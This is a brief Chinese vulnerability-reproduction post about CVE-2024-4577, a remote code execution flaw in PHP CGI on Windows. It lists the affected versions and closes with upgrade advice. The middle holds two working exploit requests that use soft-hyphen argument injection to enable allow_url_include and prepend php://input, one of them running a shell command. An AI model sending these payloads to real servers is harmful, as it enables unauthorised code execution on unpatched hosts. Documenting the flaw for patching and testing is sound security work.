本文主要是介绍【漏洞复现】PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
漏洞描述:
CVE-2024-4577导致漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的。由于Windows系统内字符编码转换的Best-Fit特性导致PHP原本的安全限制被绕过,再加上一些特殊的PHP CGI环境配置导致了这个问题。
影响版本:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
利用方式1:
通过修改httpd-xampp.conf中注释解开下面这段代码,注释之后需要重启apache服务
POST /index.php?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded<?php echo shell_exec("dir"); ?>
利用方式2
无需任何配置信息修改
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: <?php phpinfo();?>
修复建议:
目前,官方已发布修复建议,建议受影响的用户尽快升级至安全版本。
PHP 8.3 >= 8.3.8
PHP 8.2 >= 8.2.20
PHP 8.1 >= 8.1.29
下载地址:https://www.php.net/downloads.php
这篇关于【漏洞复现】PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
